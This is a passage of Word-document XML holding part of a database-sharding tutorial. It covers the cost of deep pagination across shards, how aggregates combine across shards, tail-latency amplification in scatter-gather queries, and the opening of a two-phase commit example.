        <w:t xml:space="preserve">  Problem: globally, rank 991-1000 depends on ALL rows across shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B95CE5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422DB96C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Correct: each shard must return OFFSET+LIMIT rows: LIMIT 1000 OFFSET 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2F4437" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Application merges all N × 1000 rows, sorts, takes rows 991-1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0358E5F9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047B3BD5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  At OFFSET=10,000: each shard returns 10,010 rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B2FA9A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  N=100 shards: 1,001,000 rows transferred to application → then discarded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B449D78" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Deep pagination is catastrophically expensive on sharded databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3259CEEC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Solution: keyset pagination (cursor-based) instead of OFFSET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6414C4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-Shard Aggregations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7D85A9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667D71CB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query: SELECT COUNT(*), SUM(amount), AVG(amount) FROM orders WHERE status='shipped'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75836AEF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="4DAA4C22" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Decomposable aggregates (can be computed per-shard and combined):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19379131" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  COUNT(*): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C9BA4E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Each shard: SELECT COUNT(*) FROM orders WHERE status='shipped'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFCE9F8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Combine: sum all shard counts → global COUNT(*)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA8D2AB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    ✓ Exact result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A6C277" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687F08A0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  SUM(amount):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7AC135" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Each shard: SELECT SUM(amount) FROM orders WHERE status='shipped'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C52FB5A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Combine: sum all shard sums → global SUM(amount)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56817127" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    ✓ Exact result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDECD9E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0483082F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  MAX(amount), MIN(amount):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DDA820" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Each shard: return local MAX/MIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F879E2E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Combine: MAX of all shard MAXes → global MAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CC1A49" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    ✓ Exact result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2119389D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="5F9DAD8F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Non-decomposable aggregates (require special handling):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F182E93" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  AVG(amount):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBF9F43" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Cannot average per-shard averages (averages of averages ≠ overall average)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4D895B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Correct approach: gather SUM and COUNT from each shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489B54DB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Global AVG = global SUM / global COUNT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A132583" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    ✓ Exact result with two aggregates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B92BECD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AE7864" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  COUNT(DISTINCT user_id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4D7DD4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Cannot sum per-shard distinct counts (same user_id may appear on multiple shards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E0FE43" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10873ECA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Option 1: scatter-gather all user_ids, deduplicate at coordinator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8074D2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      Cost: O(N × rows_per_shard) data transfer → prohibitive at scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0E60EC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A92643" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Option 2: HyperLogLog (probabilistic approximate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2D9ACD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      Each shard computes HLL sketch of user_ids</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9888BC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      Coordinator merges HLL sketches → approximate distinct count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C25B1A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      Accuracy: ~1-2% error, O(log log N) space per shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052DE73D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      Used by: Cassandra, Redis (PFCOUNT), BigQuery, Redshift</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0CCD20" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2626C7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  MEDIAN, PERCENTILE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AA9E8B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Not decomposable — exact percentile requires all values at coordinator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D913D3F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Exact solution: O(N × rows) data transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E77261" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Approximate: T-Digest, Greenwald-Khanna algorithm → configurable accuracy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451BBA92" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D149E1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ORDER BY with LIMIT (global top-K):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0C2A96" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Each shard returns local top-K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CA7AE9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Coordinator: N-way merge of K lists → global top-K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D9FBE2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    ✓ Exact result, efficient (each shard does O(rows log K), coordinator O(N×K log N))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA0F2A1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Fan-Out Problem at Scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C88E90C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B61540A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Scatter-gather latency model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE1E5F1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  N shards, each with p99 latency L_shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683F0E03" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56098386" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Scatter-gather p99 latency ≈ L_shard × 1  (parallel execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46077DE0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2874DE2E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  BUT: tail latency amplification (from our Throughput/Latency discussion):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267C6274" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    P(at least one shard exceeds L_shard p99) = 1 - (0.99)^N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD9CA85" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3B03A5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    N=10:  P(one shard slow) = 9.6%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650794AD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    N=100: P(one shard slow) = 63.4%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDF927A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    N=1000: P(one shard slow) = 99.996%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1203462A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A765D8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  At N=100 shards: 63% of scatter-gather queries are slowed by tail latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFAC5DF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Scatter-gather at large N is effectively bounded by worst-shard latency, not average</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5185AA8B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEC689F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B76523B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Hedged requests: after L_shard × 1.5ms, send query to backup shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053DA3AA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Speculative retry: if shard doesn't respond within SLO, query different replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BC588C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard affinity: prefer shards with known-good latency (route monitoring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9DB7A4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Result partial tolerance: return results from N-1 shards if one is slow/failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299B050B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    (for approximate analytics: acceptable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1D3124" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    (for exact business queries: not acceptable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F30A1E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="2F62A666">
          <v:rect id="_x0000_i5857" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD80B26" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Distributed Transactions Across Shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A307A03" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Cross-Shard Transaction Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C58A53" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>When a transaction modifies data on multiple shards, the single-database ACID guarantees no longer apply. A crash mid-transaction could leave some shards committed and others not — violating atomicity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455865B3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Two-Phase Commit (2PC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B424BCE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69631E7C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Scenario: Transfer $100 from User A (Shard 1) to User B (Shard 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A95769B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="72F3DFF0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Phase 1 — Prepare:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E2ECE8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Coordinator → Shard 1: "PREPARE TRANSACTION tx_123: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA7375A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                           UPDATE accounts SET balance = balance - 100 WHERE user_id = A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660364F0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Coordinator → Shard 2: "PREPARE TRANSACTION tx_123:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B444519" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                           UPDATE accounts SET balance = balance + 100 WHERE user_id = B"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751B97DC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9DD393" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Each shard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CA8398" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Acquires locks on modified rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F274C37" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Writes WAL records (but doesn't commit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A3A655" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Flushes WAL to disk (durable prepare)</w:t>
      </w:r>
    </w:p>
